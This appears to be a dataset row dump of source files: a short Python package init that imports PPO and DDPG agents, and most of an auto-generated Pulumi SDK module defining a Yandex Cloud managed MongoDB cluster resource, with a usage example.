hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8fda52d5e9720af48f2897afff48eb8a703faa4e | 93 | py | Python | agent/continuous/seperate/__init__.py | kcs93023/tensorflow_RL | b497890444961b34cb24f072a964edc9575d6ce8 | [
"MIT"
] | null | null | null | agent/continuous/seperate/__init__.py | kcs93023/tensorflow_RL | b497890444961b34cb24f072a964edc9575d6ce8 | [
"MIT"
] | null | null | null | agent/continuous/seperate/__init__.py | kcs93023/tensorflow_RL | b497890444961b34cb24f072a964edc9575d6ce8 | [
"MIT"
] | null | null | null | from agent.continuous.seperate.ppo import PPO
from agent.continuous.seperate.ddpg import DDPG | 46.5 | 47 | 0.860215 | 14 | 93 | 5.714286 | 0.5 | 0.225 | 0.475 | 0.675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 93 | 2 | 47 | 46.5 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8ffa243be1a0eace0ee93d61c5e44a6a94c25c74 | 48,363 | py | Python | sdk/python/pulumi_yandex/mdb_mongodb_cluster.py | pulumi/pulumi-yandex | 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2021-04-20T15:39:41.000Z | 2022-02-20T09:14:39.000Z | sdk/python/pulumi_yandex/mdb_mongodb_cluster.py | pulumi/pulumi-yandex | 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e | [
"ECL-2.0",
"Apache-2.0"
] | 56 | 2021-04-20T11:31:03.000Z | 2022-03-31T15:53:06.000Z | sdk/python/pulumi_yandex/mdb_mongodb_cluster.py | pulumi/pulumi-yandex | 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MdbMongodbClusterArgs', 'MdbMongodbCluster']
@pulumi.input_type
class MdbMongodbClusterArgs:
def __init__(__self__, *,
cluster_config: pulumi.Input['MdbMongodbClusterClusterConfigArgs'],
databases: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]],
environment: pulumi.Input[str],
hosts: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]],
network_id: pulumi.Input[str],
resources: pulumi.Input['MdbMongodbClusterResourcesArgs'],
users: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]],
cluster_id: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a MdbMongodbCluster resource.
:param pulumi.Input['MdbMongodbClusterClusterConfigArgs'] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[str] network_id: ID of the network, to which the MongoDB cluster belongs.
:param pulumi.Input['MdbMongodbClusterResourcesArgs'] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]] users: A user of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: The fully qualified domain name of the host. Computed on server side.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of ids of security groups assigned to hosts of the cluster.
"""
pulumi.set(__self__, "cluster_config", cluster_config)
pulumi.set(__self__, "databases", databases)
pulumi.set(__self__, "environment", environment)
pulumi.set(__self__, "hosts", hosts)
pulumi.set(__self__, "network_id", network_id)
pulumi.set(__self__, "resources", resources)
pulumi.set(__self__, "users", users)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if deletion_protection is not None:
pulumi.set(__self__, "deletion_protection", deletion_protection)
if description is not None:
pulumi.set(__self__, "description", description)
if folder_id is not None:
pulumi.set(__self__, "folder_id", folder_id)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if maintenance_window is not None:
pulumi.set(__self__, "maintenance_window", maintenance_window)
if name is not None:
pulumi.set(__self__, "name", name)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
@property
@pulumi.getter(name="clusterConfig")
def cluster_config(self) -> pulumi.Input['MdbMongodbClusterClusterConfigArgs']:
"""
Configuration of the MongoDB subcluster. The structure is documented below.
"""
return pulumi.get(self, "cluster_config")
@cluster_config.setter
def cluster_config(self, value: pulumi.Input['MdbMongodbClusterClusterConfigArgs']):
pulumi.set(self, "cluster_config", value)
@property
@pulumi.getter
def databases(self) -> pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]:
"""
A database of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def environment(self) -> pulumi.Input[str]:
"""
Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
"""
return pulumi.get(self, "environment")
@environment.setter
def environment(self, value: pulumi.Input[str]):
pulumi.set(self, "environment", value)
@property
@pulumi.getter
def hosts(self) -> pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]:
"""
A host of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Input[str]:
"""
ID of the network, to which the MongoDB cluster belongs.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: pulumi.Input[str]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter
def resources(self) -> pulumi.Input['MdbMongodbClusterResourcesArgs']:
"""
Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: pulumi.Input['MdbMongodbClusterResourcesArgs']):
pulumi.set(self, "resources", value)
@property
@pulumi.getter
def users(self) -> pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]:
"""
A user of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]):
pulumi.set(self, "users", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
"""
Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
"""
return pulumi.get(self, "deletion_protection")
@deletion_protection.setter
def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deletion_protection", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the MongoDB cluster.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
"""
return pulumi.get(self, "folder_id")
@folder_id.setter
def folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "folder_id", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A set of key/value label pairs to assign to the MongoDB cluster.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]:
return pulumi.get(self, "maintenance_window")
@maintenance_window.setter
def maintenance_window(self, value: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]):
pulumi.set(self, "maintenance_window", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The fully qualified domain name of the host. Computed on server side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of ids of security groups assigned to hosts of the cluster.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@pulumi.input_type
class _MdbMongodbClusterState:
def __init__(__self__, *,
cluster_config: Optional[pulumi.Input['MdbMongodbClusterClusterConfigArgs']] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
created_at: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
health: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input['MdbMongodbClusterResourcesArgs']] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
sharded: Optional[pulumi.Input[bool]] = None,
status: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]] = None):
"""
Input properties used for looking up and filtering MdbMongodbCluster resources.
:param pulumi.Input['MdbMongodbClusterClusterConfigArgs'] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[str] created_at: Creation timestamp of the key.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[str] health: The health of the host.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: The fully qualified domain name of the host. Computed on server side.
:param pulumi.Input[str] network_id: ID of the network, to which the MongoDB cluster belongs.
:param pulumi.Input['MdbMongodbClusterResourcesArgs'] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of ids of security groups assigned to hosts of the cluster.
:param pulumi.Input[bool] sharded: MongoDB Cluster mode enabled/disabled.
:param pulumi.Input[str] status: Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]] users: A user of the MongoDB cluster. The structure is documented below.
"""
if cluster_config is not None:
pulumi.set(__self__, "cluster_config", cluster_config)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if deletion_protection is not None:
pulumi.set(__self__, "deletion_protection", deletion_protection)
if description is not None:
pulumi.set(__self__, "description", description)
if environment is not None:
pulumi.set(__self__, "environment", environment)
if folder_id is not None:
pulumi.set(__self__, "folder_id", folder_id)
if health is not None:
pulumi.set(__self__, "health", health)
if hosts is not None:
pulumi.set(__self__, "hosts", hosts)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if maintenance_window is not None:
pulumi.set(__self__, "maintenance_window", maintenance_window)
if name is not None:
pulumi.set(__self__, "name", name)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if sharded is not None:
pulumi.set(__self__, "sharded", sharded)
if status is not None:
pulumi.set(__self__, "status", status)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter(name="clusterConfig")
def cluster_config(self) -> Optional[pulumi.Input['MdbMongodbClusterClusterConfigArgs']]:
"""
Configuration of the MongoDB subcluster. The structure is documented below.
"""
return pulumi.get(self, "cluster_config")
@cluster_config.setter
def cluster_config(self, value: Optional[pulumi.Input['MdbMongodbClusterClusterConfigArgs']]):
pulumi.set(self, "cluster_config", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp of the key.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]]:
"""
A database of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
"""
Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
"""
return pulumi.get(self, "deletion_protection")
@deletion_protection.setter
def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deletion_protection", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the MongoDB cluster.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def environment(self) -> Optional[pulumi.Input[str]]:
"""
Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
"""
return pulumi.get(self, "environment")
@environment.setter
def environment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "environment", value)
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
"""
return pulumi.get(self, "folder_id")
@folder_id.setter
def folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "folder_id", value)
@property
@pulumi.getter
def health(self) -> Optional[pulumi.Input[str]]:
"""
The health of the host.
"""
return pulumi.get(self, "health")
@health.setter
def health(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health", value)
@property
@pulumi.getter
def hosts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]]:
"""
A host of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A set of key/value label pairs to assign to the MongoDB cluster.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]:
return pulumi.get(self, "maintenance_window")
@maintenance_window.setter
def maintenance_window(self, value: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]):
pulumi.set(self, "maintenance_window", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The fully qualified domain name of the host. Computed on server side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the network, to which the MongoDB cluster belongs.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['MdbMongodbClusterResourcesArgs']]:
"""
Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['MdbMongodbClusterResourcesArgs']]):
pulumi.set(self, "resources", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of ids of security groups assigned to hosts of the cluster.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter
def sharded(self) -> Optional[pulumi.Input[bool]]:
"""
MongoDB Cluster mode enabled/disabled.
"""
return pulumi.get(self, "sharded")
@sharded.setter
def sharded(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "sharded", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]]:
"""
A user of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]]):
pulumi.set(self, "users", value)
class MdbMongodbCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_config: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterMaintenanceWindowArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]]] = None,
__props__=None):
"""
Manages a MongoDB cluster within the Yandex.Cloud. For more information, see
[the official documentation](https://cloud.yandex.com/docs/managed-mongodb/concepts).
## Example Usage
Example of creating a Single Node MongoDB.
```python
import pulumi
import pulumi_yandex as yandex
foo_vpc_network = yandex.VpcNetwork("fooVpcNetwork")
foo_vpc_subnet = yandex.VpcSubnet("fooVpcSubnet",
network_id=foo_vpc_network.id,
v4_cidr_blocks=["10.1.0.0/24"],
zone="ru-central1-a")
foo_mdb_mongodb_cluster = yandex.MdbMongodbCluster("fooMdbMongodbCluster",
cluster_config=yandex.MdbMongodbClusterClusterConfigArgs(
version="4.2",
),
databases=[yandex.MdbMongodbClusterDatabaseArgs(
name="testdb",
)],
environment="PRESTABLE",
hosts=[yandex.MdbMongodbClusterHostArgs(
subnet_id=foo_vpc_subnet.id,
zone_id="ru-central1-a",
)],
labels={
"test_key": "test_value",
},
maintenance_window=yandex.MdbMongodbClusterMaintenanceWindowArgs(
type="ANYTIME",
),
network_id=foo_vpc_network.id,
resources=yandex.MdbMongodbClusterResourcesArgs(
disk_size=16,
disk_type_id="network-hdd",
resource_preset_id="b1.nano",
),
users=[yandex.MdbMongodbClusterUserArgs(
name="john",
password="password",
permissions=[yandex.MdbMongodbClusterUserPermissionArgs(
database_name="testdb",
)],
)])
```
## Import
A cluster can be imported using the `id` of the resource, e.g.
```sh
$ pulumi import yandex:index/mdbMongodbCluster:MdbMongodbCluster foo cluster_id
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
